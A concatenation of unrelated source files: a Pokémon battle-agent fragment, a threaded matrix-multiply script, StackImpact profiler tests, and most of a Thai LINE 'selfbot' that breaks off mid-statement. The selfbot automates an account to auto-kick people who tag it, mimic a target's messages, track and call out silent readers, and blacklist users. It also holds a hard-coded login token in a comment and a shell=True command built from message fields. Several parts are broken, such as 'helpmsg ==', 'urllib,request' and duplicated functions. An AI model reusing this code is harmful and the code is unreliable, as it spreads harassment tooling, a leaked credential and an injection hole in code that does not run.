len(battle.available_moves) and not battle.force_switch ): return self.create_order(battle.available_moves[action - 12], dynamax=True) elif 0 <= action - 16 < len(battle.available_switches): return self.create_order(battle.available_switches[action - 16]) else: return self.choose_random_move(battle) @property def action_space(self) -> List: """The action space for gen 7 single battles. The conversion to moves is done as follows: 0 <= action < 4: The actionth available move in battle.available_moves is executed. 4 <= action < 8: The action - 4th available move in battle.available_moves is executed, with z-move. 8 <= action < 12: The action - 8th available move in battle.available_moves is executed, with mega-evolution. 12 <= action < 16: The action - 12th available move in battle.available_moves is executed, while dynamaxing. 16 <= action < 22 The action - 16th available switch in battle.available_switches is executed. """ return self._ACTION_SPACE
method.py
import threading # def matmult(a,b): # zip_b = zip(*b) # out = [[sum(ele_a*ele_b for ele_a, ele_b in zip(row_a, col_b)) # for col_b in zip_b] for row_a in a] # # for ele_a, ele_b in zip(row_a, col_b) # return out def mult(w,a,i,j, o): sum = 0 for k in range(len(w[0])): #print("w:{}, a:{}".format(w[i][k], a[k][j])) sum += (w[i][k] * a[k][j]) o[j][i] = sum def matmult2(w,a): #a = w, b = a rows_W = len(w) cols_W = len(w[0]) rows_A = len(a) cols_A = len(a[0]) # print("a.r:{}".format(rows_A)) # print("a.c:{}".format(cols_A)) # print("w.r:{}".format(rows_W)) # print("w.c:{}".format(cols_W)) output = [[0 for row in range(rows_W)]for col in range(cols_A)] # print output threads = [] for i in range(rows_W): for j in range(cols_A): th = threading.Thread(target=mult, args=(w,a,i,j,output)) th.start() threads.append(th) for th in threads: th.join return output # x = [[1],[2],[3],[4],[5],[6],[7],[8],[9],[10]] # y = [[1,2,3,4,5],[2,3,4,5,6],[3,4,5,6,7],[4,5,6,7,8],[5,6,7,8,9],[6,7,8,9,10],[7,8,9,10,11],[8,9,10,11,12],[9,10,11,12,13],[10,11,12,13,14]] # import numpy as np # I want to check my solution with numpy # from time import time # mx = np.matrix(x) # my = np.matrix(y) # start = time() # z = matmult2(x,y) # time_par = time() - start # print('rfunc: {:.2f} seconds taken'.format(time_par)) # print(z)
agent_test.py
import unittest import sys import threading import random import time import stackimpact from stackimpact.runtime import runtime_info, min_version # python3 -m unittest discover -v -s tests -p *_test.py class AgentTestCase(unittest.TestCase): def test_run_in_main_thread(self): if runtime_info.OS_WIN: return stackimpact._agent = None agent = stackimpact.start( dashboard_address = 'http://localhost:5001', agent_key = 'key1', app_name = 'TestPythonApp', debug = True ) result = {} def _run(): result['thread_id'] = threading.current_thread().ident def _thread(): agent.run_in_main_thread(_run) t = threading.Thread(target=_thread) t.start() t.join() self.assertEqual(result['thread_id'], threading.current_thread().ident) agent.destroy() def test_profile(self): if runtime_info.OS_WIN: return stackimpact._agent = None agent = stackimpact.start( dashboard_address = 'http://localhost:5001', agent_key = 'key1', app_name = 'TestPythonApp', debug = True ) agent.cpu_reporter.start() span = agent.profile() for i in range(0, 2000000): random.randint(1, 1000000) span.stop() agent.cpu_reporter.report() self.assertTrue('test_profile' in str(agent.message_queue.queue)) agent.destroy() def test_with_profile(self): if runtime_info.OS_WIN: return stackimpact._agent = None agent = stackimpact.start( dashboard_address = 'http://localhost:5001', agent_key = 'key1', app_name = 'TestPythonApp', debug = True ) agent.cpu_reporter.start() with agent.profile(): for i in range(0, 2000000): random.randint(1, 1000000) agent.cpu_reporter.report() self.assertTrue('test_with_profile' in str(agent.message_queue.queue)) agent.destroy() def test_cpu_profile(self): stackimpact._agent = None agent = stackimpact.start( dashboard_address = 'http://localhost:5001', agent_key = 'key1', app_name = 'TestPythonApp', auto_profiling = False, debug = True ) messages = [] def add_mock(topic, message): messages.append(message) agent.message_queue.add = add_mock agent.start_cpu_profiler() for j in range(0, 2000000): random.randint(1, 1000000) agent.stop_cpu_profiler() self.assertTrue('test_cpu_profile' in str(messages)) agent.destroy() def test_allocation_profile(self): if runtime_info.OS_WIN or not min_version(3, 4): return stackimpact._agent = None agent = stackimpact.start( dashboard_address = 'http://localhost:5001', agent_key = 'key1', app_name = 'TestPythonApp', auto_profiling = False, debug = True ) messages = [] def add_mock(topic, message): messages.append(message) agent.message_queue.add = add_mock agent.start_allocation_profiler() mem1 = [] for i in range(0, 1000): obj1 = {'v': random.randint(0, 1000000)} mem1.append(obj1) agent.stop_allocation_profiler() self.assertTrue('agent_test.py' in str(messages)) agent.destroy() def test_block_profile(self): if runtime_info.OS_WIN or not min_version(3, 4): return stackimpact._agent = None agent = stackimpact.start( dashboard_address = 'http://localhost:5001', agent_key = 'key1', app_name = 'TestPythonApp', auto_profiling = False, debug = True ) messages = [] def add_mock(topic, message): messages.append(message) agent.message_queue.add = add_mock agent.start_block_profiler() def blocking_call(): time.sleep(0.1) for i in range(5): blocking_call() agent.stop_block_profiler() self.assertTrue('blocking_call' in str(messages)) agent.destroy() if __name__ == '__main__': unittest.main()
Redsb1.1.py
# -*- coding: utf-8 -*- import LINETCR from LINETCR.lib.curve.ttypes import * from datetime import datetime import time, random, sys, ast, re, os, io, json, subprocess, threading, string, codecs, requests, ctypes, urllib, urllib2, urllib3, wikipedia, tempfile from bs4 import BeautifulSoup from urllib import urlopen from Helper.main import qr import requests from io import StringIO from threading import Thread from gtts import gTTS from googletrans import Translator #JANGAN LUPA => sudo pip install bs4 => sudo pip install BeautifulSoup => sudo pip install urllib => sudo pip install requests => sudo pip install gTTS #cl = LINETCR.LINE() #cl.login(token="ErHsHG58lvVUFDtEIDp6.Lkg8ohUsFOz1yZrKJtfpHG.LfmpMPXz95AxfZccyyYzAhO9QmXF/jRBX+9PSsq8g/I=") #cl.loginResult() cl = LINETCR.LINE() cl.login(token=qr().get()) cl.loginResult() print "\n[ ลอคอินRedselfbotสำเร็จแล้ว ]" reload(sys) sys.setdefaultencoding('utf-8') helpmsg =="""╔══════════════════ ║ 🌾RED BOT LINE THAILAND🌾 ║ ─┅═✥👊ᵀᴴᴬᴵᴸᴬᴺᴰ👊✥═┅─ ║ 💀[RED SAMURI BOT]💀 ╠══════════════════ ║ ─┅═✥🌿คำสั่ง ทั่วไป🌿✥═┅─ ╠══════════════════ ╠❂➣ [Id]ไอดีเรา ╠❂➣ [Mid] เอาเอมไอดีเรา ╠❂➣ [Me] ส่งคทตัวเอง ╠❂➣ [TL 「Text」โพสบนทามไลน์ ╠❂➣ [MyName]เปลี่ยนชื่อ ╠❂➣ [Gift] สงของขวัญ ╠❂➣ [Mid 「mid」 ╠❂➣ [Group id] ╠❂➣ [Group cancel] ╠❂➣ [album 「id」] ╠❂➣ [Hapus album 「id」 ╠❂➣ [เปิดคท] เปิด คท ╠❂➣ [ปิดคท] ปิด คท ╠❂➣ [เปิดเข้า] เปิดเข้าห้องอัตโมัติ ╠❂➣ [ปิดเข้า] ปิดเข้าห้องอัตโมัติ ╠❂➣ [Group cancel] ลบรัน ╠❂➣ [เปิดออก] เปิดไม่เข้าแชทรวม ╠❂➣ [ปิดออก] เข้าแชทรวม ╠❂➣ [เปิดแอด/ปิดแอด] เปิด/ปิดรับเพื่อน ╠❂➣ [Jam on]] เปิดชื่อนาฬิกา ╠❂➣ [Jam off] ปิดชื่อนาฬิกา ╠❂➣ [red say ] ส่งข้อความ ╠❂➣ [Up] อัพเดชชื่อ ╠❂➣ [Ban:on] เปิดสั่งแบน ╠❂➣ [Unban:on] เปิดแก้แบน ╠❂➣ [Banlist] เช็ครายชื่อโดนแบน ╠❂➣ [เปิดเม้น] เปิดคอมเม้น ╠❂➣ [ปิดเม้น] ปิดคอมเม้น ╠❂➣ [Com set:] ตั้งค่าคอมเม้น ╠❂➣ [Mcheck] เช็คแบน ╠❂➣ [Conban,Contactban] ส่งคท คนโดนแบน ╠❂➣ [Cb] ╠❂➣ [Clear ban] ล้างแบน ╠❂➣ [พูด ] สั่งเซลพูด ╠❂➣ [Message Confirmation] ยืนยันข้อความ ╠❂➣ [Mybio: 「Iตัส] เปลี่บนตัส ╠❂➣ [Key] ╠══════════════════ ║─┅═✥🌿คำสั่งในกลุ่ม🌿✥═┅─ ╠══════════════════ ╠❂➣ [Red on/off] ╠❂➣ [เปิดลิ้ง]เปิดกันลิ้ง ╠❂➣ [ปิดลิ้ง]ปิดกันลิ้ง ╠❂➣ [Invite「mid」] เชิญด้วยmid ╠❂➣ [Kmid: ] สั่งเตะด้วยmid ╠❂➣ [Ginfo] สถานะห้อง ╠❂➣ [Cancel] ลบค้างเชิญ ╠❂➣ [Gn 「ชื่อห้อง」เปลี่ยนชื่อห้อง ╠❂➣ [Gurl] ขอลิ้งห้อง ╠❂➣ [gurl「kelompok ID] ╠══════════════════ ║ ─┅═✥🌿คำสั่งสายมาร🌿✥═┅─ ╠══════════════════ ╠❂➣ [Mcheck] เช็คคนติดดำทั้งหมด ╠❂➣ [Banlist]เช๊คคนติดดำในห้อง ╠❂➣ [Unbam @] แก้ดำ ใส่@text ╠❂➣ [หวัดดี @] หยอกเตะแล้วดึงกลับ ╠❂➣ [หวด @] เซลเตะ ╠❂➣ [Ban:]สั่งดำ mid ╠❂➣ [Unban:] ล้างดำ mid ╠❂➣ [เปิดกัน] เปิดป้องกัน ╠❂➣ [เปิดลิ้ง/ปิดลิ้ง] เปิด/ปิดกันลิ้ง ╠❂➣ [กันเชิญ] เปิดกันเชิญ ╠❂➣ [Cancel on] เปิดกันลบค้างเชิญ ╠══════════════════ ║─┅═✥🌿คำสั่งสายขาว🌿✥═┅─ ╠══════════════════ ╠❂➣ [Copy @] ก๊อปโปรไฟล์ ╠❂➣ [Kembali] กลับคืนร่าง ╠❂➣ [ส่องรูป @] ดูรูปปนะจำตัว ╠❂➣ [ส่องปก @] ดูรูปปก ╠❂➣ [จับ] ต้้งค่าคนอ่าน ╠❂➣ [อ่าน] ดูคนอ่าน ╠❂➣ [เปิดอ่าน] เปิดการอ่าน ╠❂➣ [ปิดอ่าน] ปิดการอ่าน ╠❂➣ [อ่าน] ดูคนอ่าน ╠❂➣ [ใครแทค] แทกชื่อสมาชิก ╠❂➣ [tag all] ╠❂➣ [ยกเลิกเชิญ] ลบค้างเชิญ ╠❂➣ [Gbroadcast] ประกาศกลุ่ม ╠❂➣ [Cbroadcast] ประกาศแชท ╠❂➣ [siri (ใส่ข้อความ)] ╠❂➣ [siri: (ใส่ข้อความ)] ╠══════════════════ ║•─✯͜͡ ✯RED★SAMURI★SELFBOT✯͜͡ ✯─• ╠══════════════════ ╠http//:line.me/ti/p/~samuri5 ╚══════════════════ """ helpMessage2 ="""╔══════════════════ ║ 🎀✨คำสั่งใช้ลบรัน✨🎀 ╠══════════════════ ║✰ลบรัน ➠เซลบอทลบรัน ║✰ลบแชท ➠เซลบอทลบแชต ╔══════════════════ ║ ✦เปิด/ปิดข้อความต้อนรับ✦ ╠══════════════════ ║✰ Thx1 on ➠เปิดข้อความต้อนรับ ║✰ Thx1 off ➠ปิดข้อความต้อนรับ ║✰ Thx2 on ➠เปิดข้อความออกกลุ่ม ║✰ Thx2 off ➠เปิดข้อความออกกลุ่ม ║✰ Thx3 on ➠เปิดข้อความคนลบ ║✰ Thx3 off ➠เปิดข้อความคนลบ ║✰ Mbot on ➠เปิดเเจ้งเตือนบอท ║✰ Mbot off ➠ปิดเเจ้งเตือนบอท ║✰ M on ➠เปิดเเจ้งเตือนตนเอง ║✰ M off ➠ปิดเเจ้งเตือนตนเอง ║✰ Tag on ➠เปิดกล่าวถึงเเท็ค ║✰ Tag off ➠ปิดกล่าวถึงเเท็ค ║✰ Kicktag on ➠เปิดเตะคนเเท็ค ║✰ Kicktag off ➠ปิดเตะคนเเท็ค ╠══════════════════ ║ ⌚โหมดตั้งค่าข้อความ⌚ ╠══════════════════ ║✰ Thx1˓: ➠ไส่ข้อความต้อนรับ ║✰ Thx2˓: ➠ไส่ข้อความออกจากกลุ่ม ║✰ Thx3˓: ➠ไส่ข้อความเมื่อมีคนลบ ╠══════════════════ ║✰ Thx1 ➠เช็คข้อความต้อนรับ ║✰ Thx2 ➠เช็คข้อความคนออก ║✰ Thx3 ➠เช็คข้อความคนลบ ╠═════════════════ ║ ─┅═✥ᵀᴴᴬᴵᴸᴬᴺᴰ✥═┅─ ║ •─✯͜͡ ✯RED★SAMURI★SELFBOT✯͜͡ ✯─• 「OR」\n╠-> help1\n╠-> help2\n╠-> help3\n╠-> help4\n╠-> help5 ╠══════════════════ """ helppro =""" ╠══════════════════ ╠❂➣ [Read on/off][เปิด/ปิดระบบป้องกันทั้งหมด] ╠❂➣ [เปิดลิ้ง/ปิดลิ้ง] ╠❂➣ [กันเชิญ/ปิดกันเชิญ] ╠❂➣ [กันยก/ปิดกันยก] ╠❂➣ [เปิดกัน/ปิดกัน] ╠❂➣ [ออก:][จำนวนกลุ่มที่จะปฏิเสธ] ╠❂➣ [ออก:off] ปิดปฏิเสธการเชิญเข้ากลุ่ม ╠❂➣ ╠══════════════════ ║•─✯͜͡ ✯RED★SAMURI★SELFBOT✯͜͡ ✯─• ╠══════════════════ ╠http//:line.me/ti/p/~samuri5 ╚══════════════════""" helpself =""" ╠══════════════════ ║─┅═✥🌿คำสั่งสายขาว🌿✥═┅─ ╠══════════════════ ╠❂➣ [Copy @] ก๊อปโปรไฟล์ ╠❂➣ [Kembali] กลับคืนร่าง ╠❂➣ [ส่องรูป @] ดูรูปปนะจำตัว ╠❂➣ [ส่องปก @] ดูรูปปก ╠❂➣ [จับ] ต้้งค่าคนอ่าน ╠❂➣ [อ่าน] ดูคนอ่าน ╠❂➣ [เปิดอ่าน] เปิดการอ่าน ╠❂➣ [ปิดอ่าน] ปิดการอ่าน ╠❂➣ [อ่าน] ดูคนอ่าน ╠❂➣ [ใครแทค] แทกชื่อสมาชิก ╠❂➣ [Sider on/off][จับคนอ่านแบบเรียงตัว] ╠❂➣ [ยกเลิกเชิญ] ลบค้างเชิญ ╠❂➣ [Gbroadcast] ประกาศกลุ่ม ╠❂➣ [Cbroadcast] ประกาศแชท ╠❂➣ [siri (ใส่ข้อความ)] ╠❂➣ [siri: (ใส่ข้อความ)] ╠══════════════════ ║•─✯͜͡ ✯RED★SAMURI★SELFBOT✯͜͡ ✯─• ╠══════════════════ ╠http//:line.me/ti/p/~samuri5 ╚══════════════════ """ helpset =""" ╠══════════════════ ╠❂➣ [เช็ค1][] ╠❂➣ [เช็ค2][] ╠❂➣ [เปิดแชร์/ปิดแชร์][] ╠❂➣ [เปิดเม้น/ปิดเม้น][] ╠❂➣ [เปิดคท/ปิดคท][] ╠❂➣ [เปิดเข้า/ปิดเข้า][] ╠❂➣ [เปิดออก/ปิดออก][] ╠❂➣ [เปิดแอด/ปิดแอด][] ╠❂➣ [เปิดไลค์/ปิดไลค์][] ╠❂➣ [like friend][] ╠❂➣ [respon on/off][] ╠❂➣ [read on/off][] ╠❂➣ [simisimi on/off][] ╠❂➣ [Kicktag on/off][] ╠❂➣ ╠══════════════════ ║•─✯͜͡ ✯RED★SAMURI★SELFBOT✯͜͡ ✯─• ╠══════════════════ ╠http//:line.me/ti/p/~samuri5 ╚══════════════════""" helpgrup =""" ╠══════════════════ ╠❂➣ [Url][ขอลื้งกลุ่ม] ╠❂➣ [Cancel][ยกค้างเชิญ] ╠❂➣ [Gcreator][ผู้สร้างกลุ่ม] ╠❂➣ [Gname:][เปลี่ยนชื่อกลุ่ม] ╠❂➣ [Infogrup][ดูข้อมูลกลุ่ม] ╠❂➣ [Gruplist][ดูรูปกลุ่ม] ╠❂➣ [ออก:][+จำนวนกลุ่มที่จะปฏิเสธ] ╠❂➣ [ออก:off][ปิดปฏิเสธการเชิญเข้ากลุ่ม] ╠❂➣ [playstore (text)][เซิร์ในเพลสโต] ╠❂➣ [Profileig (username)] ╠❂➣ [wikipedia (text)][เซิร์ทในเว็บ] ╠❂➣ [idline (text)][เชิร์ทไอดีไลน์] ╠❂➣ [ytsearch (text)][เซิรทในยูทูป] ╠❂➣ [Time][ดูเวลา] ╠❂➣ [lirik (text)] ╠══════════════════ ║•─✯͜͡ ✯RED★SAMURI★SELFBOT✯͜͡ ✯─• ╠══════════════════ ╠http//:line.me/ti/p/~samuri5 ╚══════════════════""" helptranslate =""" ╠══════════════════ ╠❂➣ [Id @en] ╠❂➣ [En @id] ╠❂➣ [Id @jp] ╠❂➣ [Jp @id] ╠❂➣ [Id @th] ╠❂➣ [Th @id] ╠❂➣ [Id @ar] ╠❂➣ [Ar @id] ╠❂➣ [Id @ko] ╠❂➣ [Ko @id] ╠❂➣ [Say-id] ╠❂➣ [Say-en] ╠❂➣ [Say-jp] ╠❂➣ [พูด ][ข้อความ] ╠══════════════════ ║•─✯͜͡ ✯RED★SAMURI★SELFBOT✯͜͡ ✯─• ╠══════════════════ ╠http//:line.me/ti/p/~samuri5 ╚══════════════════""" helpThx ="""╔══════════════════ ║ 🎀✨คำสั่งใช้ลบรัน✨🎀 ╠══════════════════ ║✰ลบรัน ➠เซลบอทลบรัน ║✰ลบแชท ➠เซลบอทลบแชต ╠══════════════════ ║ ✦เปิด/ปิดข้อความต้อนรับ✦ ╠══════════════════ ║✰ Thx1 on ➠เปิดข้อความต้อนรับ ║✰ Thx1 off ➠ปิดข้อความต้อนรับ ║✰ Thx2 on ➠เปิดข้อความออกกลุ่ม ║✰ Thx2 off ➠เปิดข้อความออกกลุ่ม ║✰ Thx3 on ➠เปิดข้อความคนลบ ║✰ Thx3 off ➠เปิดข้อความคนลบ ║✰ M on ➠เปิดเเจ้งเตือนตนเอง ║✰ M off ➠ปิดเเจ้งเตือนตนเอง ║✰ Tag on ➠เปิดกล่าวถึงเเท็ค ║✰ Tag off ➠ปิดกล่าวถึงเเท็ค ║✰ Kicktag on ➠เปิดเตะคนเเท็ค ║✰ Kicktag off ➠ปิดเตะคนเเท็ค ╠══════════════════ ║ ⌚โหมดตั้งค่าข้อความ⌚ ╠══════════════════ ║✰ Thx1˓: ➠ไส่ข้อความต้อนรับ ║✰ Thx2˓: ➠ไส่ข้อความออกจากกลุ่ม ║✰ Thx3˓: ➠ไส่ข้อความเมื่อมีคนลบ ╠══════════════════ ║✰ Thx1 ➠เช็คข้อความต้อนรับ ║✰ Thx2 ➠เช็คข้อความคนออก ║✰ Thx3 ➠เช็คข้อความคนลบ ╠═════════════════ ║ ─┅═✥ᵀᴴᴬᴵᴸᴬᴺᴰ✥═┅─ ║ •─✯͜͡ ✯RED★SAMURI★SELFBOT✯͜͡ ✯─• ╠══════════════════""" KAC=[cl] mid = cl.getProfile().mid mid = cl.getProfile().mid Bots=[mid,"ub5abe828cd964292195c3c59d6322033"] admin=["ub5abe828cd964292195c3c59d6322033"] wait = { "likeOn":False, "alwayRead":False, "detectMention":True, "kickMention":False, "steal":True, 'pap':{}, 'invite':{}, "spam":{}, 'contact':False, 'autoJoin':True, 'autoCancel':{"on":False,"members":5}, 'leaveRoom':True, 'timeline':False, 'autoAdd':True, 'message':"""🌾(●´з`)♡🌹แอดมาทำไมคับ 🌸แอดมาจีบรึแอดมารัน🌹(´ε` )♡🌾""", "lang":"JP", "comment":"...by redbot", "commentOn":False, "commentBlack":{}, "wblack":False, "dblack":False, "clock":False, "cNames":" ─┅͜͡✥ه﷽ Red﷽ه✥͜͡", "cNames":"", "blacklist":{}, "wblacklist":False, "dblacklist":False, "protect":False, "cancelprotect":False, "inviteprotect":False, "linkprotect":False, "Sider":{}, "Simi":{}, "lang":"JP", "BlGroup":{} } wait2 = { "readPoint":{}, "readMember":{}, "setTime":{}, "ROM":{} } cctv = { "cyduk":{}, "point":{}, "sidermem":{} } mimic = { "copy":False, "copy2":False, "status":False, "target":{} } settings = { "simiSimi":{} } res = { 'num':{}, 'us':{}, 'au':{}, } setTime = {} setTime = wait2['setTime'] mulai = time.time() contact = cl.getProfile() backup = cl.getProfile() backup.displayName = contact.displayName backup.statusMessage = contact.statusMessage backup.pictureStatus = contact.pictureStatus def restart_program(): python = sys.executable os.execl(python, python, * sys.argv) def download_page(url): version = (3,0) cur_version = sys.version_info if cur_version >= version: #If the Current Version of Python is 3.0 or above import urllib,request #urllib library for Extracting web pages try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" req = urllib,request.Request(url, headers = headers) resp = urllib,request.urlopen(req) respData = str(resp.read()) return respData except Exception as e: print(str(e)) else: #If the Current Version of Python is 2.x import urllib2 try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17" req = urllib2.Request(url, headers = headers) response = urllib2.urlopen(req) page = response.read() return page except: return"Page Not found" #Finding 'Next Image' from the given raw page def _images_get_next_item(s): start_line = s.find('rg_di') if start_line == -1: #If no links are found then give an error! end_quote = 0 link = "no_links" return link, end_quote else: start_line = s.find('"class="rg_meta"') start_content = s.find('"ou"',start_line+90) end_content = s.find(',"ow"',start_content-90) content_raw = str(s[start_content+6:end_content-1]) return content_raw, end_content def sendAudio(self, to, path): objectId = self.sendMessage(to=to, text=None, contentType = 3).id files = { 'file': open(path, 'rb'), } params = { 'name': 'media', 'oid': objectId, 'size': len(open(path, 'rb').read()), 'type': 'audio', 'ver': '1.0', } data = { 'params': json.dumps(params) } r = self.server.postContent(self.server.LINE_OBS_DOMAIN + '/talk/m/upload.nhn', data=data, files=files) if r.status_code != 201: raise Exception('Upload audio failure.') return True def sendAudio(self, to_, path): M = Message(to=to_,contentType = 3) M.contentMetadata = None M.contentPreview = None M_id = self.Talk.client.sendMessage(0,M).id files = { 'file': open(path, 'rb'), } params = { 'name': 'media', 'oid': M_id, 'size': len(open(path, 'rb').read()), 'type': 'audio', 'ver': '1.0', } data = { 'params': json.dumps(params) } r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files) if r.status_code != 201: raise Exception('Upload image failure.') return True def sendAudioWithURL(self, to_, url): path = 'pythonLiness.data' r = requests.get(url, stream=True) if r.status_code == 200: with open(path, 'w') as f: shutil.copyfileobj(r.raw, f) else: raise Exception('Download Audio failure.') try: self.sendAudio(to_, path) except Exception as e: raise e #Getting all links with the help of '_images_get_next_image' def _images_get_all_items(page): items = [] while True: item, end_content = _images_get_next_item(page) if item == "no_links": break else: items.append(item) #Append all the links in the list named 'Links' time.sleep(0.1) #Timer could be used to slow down the request for image downloads page = page[end_content:] return items def download_page(url): version = (3,0) cur_version = sys.version_info if cur_version >= version: #If the Current Version of Python is 3.0 or above import urllib,request #urllib library for Extracting web pages try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" req = urllib,request.Request(url, headers = headers) resp = urllib,request.urlopen(req) respData = str(resp.read()) return respData except Exception as e: print(str(e)) else: #If the Current Version of Python is 2.x import urllib2 try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17" req = urllib2.Request(url, headers = headers) response = urllib2.urlopen(req) page = response.read() return page except: return"Page Not found" def upload_tempimage(client): ''' Upload a picture of a kitten. We don't ship one, so get creative! ''' config = { 'album': album, 'name': 'bot auto upload', 'title': 'bot auto upload', 'description': 'bot auto upload' } print("Uploading image... ") image = client.upload_from_path(image_path, config=config, anon=False) print("Done") print() def summon(to, nama): aa = "" bb = "" strt = int(14) akh = int(14) nm = nama for mm in nm: akh = akh + 2 aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},""" strt = strt + 6 akh = akh + 4 bb += "\xe2\x95\xa0 @x \n" aa = (aa[:int(len(aa)-1)]) msg = Message() msg.to = to msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90" msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'} print "[Command] Tag All" try: cl.sendMessage(msg) except Exception as error: print error def waktu(secs): mins, secs = divmod(secs,60) hours, mins = divmod(mins,60) return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs) def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX... tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"] for texX in tex: for command in commands: if string ==command: return True return False def sendMessage(to, text, contentMetadata={}, contentType=0): mes = Message() mes.to, mes.from_ = to, profile.mid mes.text = text mes.contentType, mes.contentMetadata = contentType, contentMetadata if to not in messageReq: messageReq[to] = -1 messageReq[to] += 1 def bot(op): try: if op.type == 0: return if op.type == 5: if wait["autoAdd"] == True: cl.findAndAddContactsByMid(op.param1) if (wait["message"] in [""," ","\n",None]): pass else: cl.sendText(op.param1,str(wait["message"])) if op.type == 55: try: group_id = op.param1 user_id=op.param2 subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, ) except Exception as e: print e if op.type == 55: try: if cctv['cyduk'][op.param1]==True: if op.param1 in cctv['point']: Name = cl.getContact(op.param2).displayName # Name = summon(op.param2) if Name in cctv['sidermem'][op.param1]: pass else: cctv['sidermem'][op.param1] += "\n• " + Name if " " in Name: nick = Name.split(' ') if len(nick) == 2: cl.sendText(op.param1, "ฮั่นแน่ " + "☞ " + Name + " ☜" + "\nรู้นะว่าอ่านอยู่. . .\nออกมาคุยเดี๋ยวนี้ (-__-) ") time.sleep(0.2) summon(op.param1,[op.param2]) else: cl.sendText(op.param1, "ฮั่นแน่ " + "☞ " + Name + " ☜" + "\nนี่ก็อีกคน. . .อ่านอย่างเดียวเลย\nไม่ออกมาคุยล่ะ (-__-) ") time.sleep(0.2) summon(op.param1,[op.param2]) else: cl.sendText(op.param1, "ฮั่นแน่ " + "☞ " + Name + " ☜" + "\nแอบกันจังเลยนะ???\nคิดว่าเป็นนินจารึไง...??😆😆 ") time.sleep(0.2) summon(op.param1,[op.param2]) else: pass else: pass except: pass else: pass if op.type == 25: msg = op.message if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True: text = msg.text if text is not None: cl.sendText(msg.to,text) if op.type == 19: if mid in op.param3: wait["blacklist"][op.param2] = True if op.type == 22: if wait["leaveRoom"] == True: cl.leaveRoom(op.param1) if op.type == 24: if wait["leaveRoom"] == True: cl.leaveRoom(op.param1) if op.type == 25: msg = op.message if msg.toType == 0: msg.to = msg.from_ if msg.from_ == "ub5abe828cd964292195c3c59d6322033": if "join:" in msg.text: list_ = msg.text.split(":") try: cl.acceptGroupInvitationByTicket(list_[1],list_[2]) G = cl.getGroup(list_[1]) G.preventJoinByTicket = True cl.updateGroup(G) except: cl.sendText(msg.to,"error") if msg.toType == 1: if wait["leaveRoom"] == True: cl.leaveRoom(msg.to) if msg.contentType == 16: url = msg.contentMetadata["postEndUrl"] cl.like(url[25:58], url[66:], likeType=1001) if op.type == 25: msg = op.message if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True: text = msg.text if text is not None: cl.sendText(msg.to,text) if op.type == 26: msg = op.message if msg.to in settings["simiSimi"]: if settings["simiSimi"][msg.to] == True: if msg.text is not None: text = msg.text r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt") data = r.text data = json.loads(data) if data['status'] == 200: if data['result']['result'] == 100: cl.sendText(msg.to, "[From Simi]\n" + data['result']['response'].encode('utf-8')) if 'MENTION' in msg.contentMetadata.keys() != None: if wait["detectMention"] == True: contact = cl.getContact(msg.from_) cName = contact.displayName balas = ["",cName + " มีไร ?, ", cName + " แทคทมาย? จะถามไรเชิญที่แชทส.ต, " + cName + "?", " แทคอีกแระ? แทคแล้วไม่พูดโดนดีดนะ😄😄, " + cName + "?","ว่างายยย...มีอะไรกะว่ามา?, ", "จิแทคทำไมนักวุ้.. เดะปั๊ดจับปี้ซะรุย"] ret_ = "." + random.choice(balas) name = re.findall(r'@(\w+)', msg.text) mention = ast.literal_eval(msg.contentMetadata['MENTION']) mentionees = mention['MENTIONEES'] for mention in mentionees: if mention['M'] in Bots: cl.sendText(msg.to,ret_) break if 'MENTION' in msg.contentMetadata.keys() != None: if wait["kickMention"] == True: contact = cl.getContact(msg.from_) cName = contact.displayName balas = ["",cName + " คุณทำผิดกฎ?, ", cName + " ไม่ต้องถามว่าโดนเพราะอะไร?, " + cName + "?", "งงละดิ😆😆, " + cName + "?","เดะจิโดนไม่ใช่น้อย., ", "บอกแล้วไม่ฟัง -_-, "] ret_ = "**Auto Respond** " + random.choice(balas) name = re.findall(r'@(\w+)', msg.text) mention = ast.literal_eval(msg.contentMetadata['MENTION']) mentionees = mention['MENTIONEES'] for mention in mentionees: if mention['M'] in Bots: cl.sendText(msg.to,ret_) cl.kickoutFromGroup(msg.to,[msg.from_]) if msg.contentType == 13: if wait['invite'] == True: _name = msg.contentMetadata["displayName"] invite = msg.contentMetadata["mid"] groups = cl.getGroup(msg.to) pending = groups.invitee targets = [] for s in groups.members: if _name in s.displayName: cl.sendText(msg.to, _name + " เชิญคนนี้เข้ากลุ่มแล้ว") else: targets.append(invite) if targets == []: pass else: for target in targets: try: cl.findAndAddContactsByMid(target) cl.inviteIntoGroup(msg.to,[target]) cl.sendText(msg.to,"Invite " + _name) wait['invite'] = False break except: cl.sendText(msg.to,"Error") wait['invite'] = False break if msg.contentType == 13: if wait["steal"] == True: _name = 